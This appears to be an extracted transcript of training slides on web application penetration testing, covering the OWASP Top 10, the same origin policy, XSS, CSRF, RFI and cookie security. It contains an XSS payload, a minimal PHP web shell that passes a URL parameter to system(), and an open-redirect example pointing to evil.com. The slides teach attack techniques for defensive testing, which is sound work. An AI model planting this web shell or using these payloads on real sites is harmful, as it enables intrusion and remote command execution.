![BUT BUT BUT …. You cannot put any domain in document.domain. The document.domainmust be the superdomain of the domain from which the page originated, such as foo.com from . <iframesrc="http://www.foo.com/bar/baz.html" onload="frames[0].document.body.innerHTML+=’< imgsrc=xonerror=alert(1)’“></iframe> www.foo.com](https://image.slidesharecdn.com/penetrationtestingwebapplicationwebapplicationinsecurity-150126080645-conversion-gate02/75/Penetration-testing-web-application-web-application-in-security-39-2048.jpg)
![if (!empty($_GET['cmd '])){ echo("<pre>"); $ff=$_GET['cmd ']; system($ff); echo("</pre>"); }?> WEB SHELL <?php](https://image.slidesharecdn.com/penetrationtestingwebapplicationwebapplicationinsecurity-150126080645-conversion-gate02/75/Penetration-testing-web-application-web-application-in-security-70-2048.jpg)
Uploaded byNahidul Kibria
Penetration testing web application web application (in) security
The document discusses web application security, emphasizing the importance of penetration testing to identify vulnerabilities such as XSS, SQL injection, and CSRF. It outlines various techniques and tools used for testing and securing web applications, alongside references to the OWASP Top 10 security risks. Additionally, it highlights key concepts like the same origin policy and cookie security measures to enhance web application defenses.
Penetration testing web application web application (in) security
- 2. PENETRATION TESTING WEB APPLICATION/WEB APPLICATION(IN) SECURITY@nahidupa
- 3.
- 4. DISCLAIMER Do notuse anythingyoulearn here withoutlegalauthorization “with greatpower comes greatresponsibility” –also with great Knowledge comes great I'm copied text/images from internethere and there... it's not posssible to mention allsource thanks all.
- 5. WHAT IS NOTWEB APPLICATION SECURITY? NotNetwork Security Network SecurityMostlyIgnores the Contents of HTTP Traffic. Firewalls, Intrusion Detection Systems.
- 6. TODAYS SCOPE We willlearnbasis Notgoingtoo much details on developing/defense Tryto show some automation
- 7.
- 8. WEB APPLICATION THREATSURFACE XSS CSRF Parameter tempering /sniffing DirectoryTraversal FORGED TOKEN DIRECTOBJECT REFERENCE Click jacking XML Injection SQLInjection
- 9. THERE ARE MANYWEB APPLICATION SECURITY RISKS
- 10. OWASP TOP 10WEB APPLICATION SECURITY RISKS
- 11. OWASP RISK RATINGMETHODOLOGY
- 12. OWASP RISK RATINGMETHODOLOGY
- 13. OWASP RISK RATINGMETHODOLOGY
- 14. OWASP RISK RATINGMETHODOLOGY
- 15. OWASP RISK RATINGMETHODOLOGY
- 16. OWASP RISK RATINGMETHODOLOGY
- 17. OWASP RISK RATINGMETHODOLOGY
- 18. OWASP RISK RATINGMETHODOLOGY
- 19. OWASP RISK RATINGMETHODOLOGY
- 20. OWASP RISK RATINGMETHODOLOGY
- 21.
- 22. BASIC HTTP ANDHTTPS PROTOCOLS HTTP is connection less HTTP is mediaindependent HTTP is stateless more
- 23. MYTH OF WEBAPPLICATION SECURITY AND REALITY more
- 24. PENETRATION TESTING We cantryin offensive way
- 25. PENETRATION TESTING Attemptto compromisesecuritybyusingthe same techniques of the attacker If I was an attacker, how far would I be able to go? How easyis itto compromise this computer |network | application | system?
- 26. WHY PENETRATION TESTING? Hackyourself before someone else do. Save Money!=== Save reputation!
- 27. INFORMATION GATHER ONTARGET The Dark Arts of Open-source intelligence (OSINT)
- 28.
- 29. WHAT WEB CMS Identification WPScan Plecost BlindElephant.pyhttp://127.0.0.1 guess
- 31. WEB BROWSER SECURITYMODELS The same origin policy The cookies securitymode The Flash securitymodel/SandBox (Class 5 RIA)
- 32. SAME ORIGIN POLICY Thesame origin policyprevents documentor scriptloaded from one origin, from gettingor settingproperties from aof a documentfrom adifferentorigin. An origin is defined as the combination of hostname, protocol, and portnumber;
- 33. URL ANATOMY Globalidentifiers ofnetwork-retrievable documents Specialcharacters are encoded as hex: %0A= newline %20 = space, %2Bmean +
- 38. EXCEPTIONS TO THESAME ORIGIN POLICY Browsers can be instructed to allow limited exceptions to the same origin policy by setting JavaScript’s document. Domain variable on the requested page. Ifhttp://www.foo.com/bar/baz.htmlhadthefollowinginitspage, <script> document.domain="foo.com"; </script> thenhttp://xyz.foo.com/anywhere.htmlcansendanHTTPrequestto http://www.foo.com/bar/baz.htmlandreaditscontents.
- 39. BUT BUT BUT…. You cannot put any domain in document.domain. The document.domainmust be the superdomain of the domain from which the page originated, such as foo.com from . <iframesrc="http://www.foo.com/bar/baz.html" onload="frames[0].document.body.innerHTML+=’< imgsrc=xonerror=alert(1)’“></iframe> www.foo.com
- 40. WHAT HAPPENS IFTHE SAME ORIGIN POLICY IS BROKEN?
- 41. CROSS-SITE SCRIPTING (XSS) XSSis an attack technique thatforces aWeb site to display malicious code, which then executes in auser’s Web browser.
- 42. HOW ?? While browserparse htmlif found scripttagitload as script/JavaScript
- 43.
- 44. WHAT MAKES XSSSO SCARY?
- 45. WHAT CAN ANATTACKER DO WITH XSS HistoryStealing IntranetHacking XSS Defacements DNS pinning HackingJSON Cookie stealing Clipboard stealing Even more?Whatelse you need?
- 46.
- 47. Browser make previouslyvisitedlink in differentcolor HISTORY STEALING
- 49.
- 50. REAL LIFE EXAMPLE(EXPOSED) WhoStealingyou history
- 51.
- 52. OBTAINING NAT’ED IPADDRESSES
- 53.
- 54.
- 55. BLIND WEB SERVERFINGERPRINTING ApacheWebServer /icons/apache_pb.gif HPPrinter /hp/device/hp_invent_logo.gif <'imgsrc="http://intranet_ip/unique_image_url">
- 56.
- 57.
- 58. HOW TO FINDTHIS TYPE OF BUG ? demo ...lab
- 59.
- 60.
- 61.
- 62.
- 65. CSRF(CROSS-SITE REQUEST FORGERY) more TheSleepingGiant
- 66.
- 67.
- 68.
- 69. RFI(REMOTE FILE INCLUSION) RemoteFile Inclusion (RFI) is atype of vulnerabilitymostoften found on websites, itallows an attacker to include aremote file usuallythrough ascripton the web server
- 70. if (!empty($_GET['cmd '])){ echo("<pre>"); $ff=$_GET['cmd']; system($ff); echo("</pre>"); }?> WEB SHELL <?php
- 71.
- 72. REVIEW WHAT WEDONE SO FAR
- 73. BROKEN AUTHENTICATION ANDSESSION MANAGEMENT more in ppt
- 74.
- 75.
- 76. INSECURE DIRECT OBJECTREFERENCES http://example.com/app/accountInfo?acct=345345345 http://example.com/app/accountInfo?acct=643343341 http://example.com/app/accountInfo?acct=84334d340
- 77. USING COMPONENTS WITHKNOWN VULNERABILITIES
- 78. UNVALIDATED REDIRECTS ANDFORWARDS
- 79. SCENARIO #1: The applicationhas apage called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts amalicious URL thatredirects users to amalicious site thatperforms phishingand installs malware. http://www.example.com/redirect.jsp?url=evil.com
- 80. SCENARIO #2: The applicationuses forward to route requests between differentparts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sentif a transaction is successful. In this case, the attacker crafts aURL thatwillpass the application’s access controlcheck and then forward the attacker to an administrative function thatshe would notnormallybe able to access. http://www.example.com/boring.jsp?fwd=admin.jsp
- 81.
- 82. SECURITY MISCONFIGURATION Customise yourerror messages http://www.troyhunt.com/2010/12/owasp-top-10-for-net- developers-part-6.html
- 83. HOW MANY TIMEYOU SAW THIS IN LIVE SERVER?
- 84.
- 85. MIXED CONTENT: HTTPAND HTTPS
- 86.
- 87.
- 88. COOKIE SECURITY POLICY Pathattribute:domain securitymodel http://x.y.z.com/a/WebApp setacookie with path /a; then the cookie would be sentto allrequests to http://x.y.z.com/a/*only. The cookie would notbe sentto http://x.y.z.com/index.htmlor http://x.y.z.com/a/b/index.html.
- 89. COOKIE SECURITY POLICY Secureattribute:Ifacookie hasthisattribute set,the cookie issent onlyonHTTPS requests.
- 90.
- 91.
- 93. OWASP TESTING FRAMEWORK OWASPTestingGuide More in PPT
- 94.
- 95.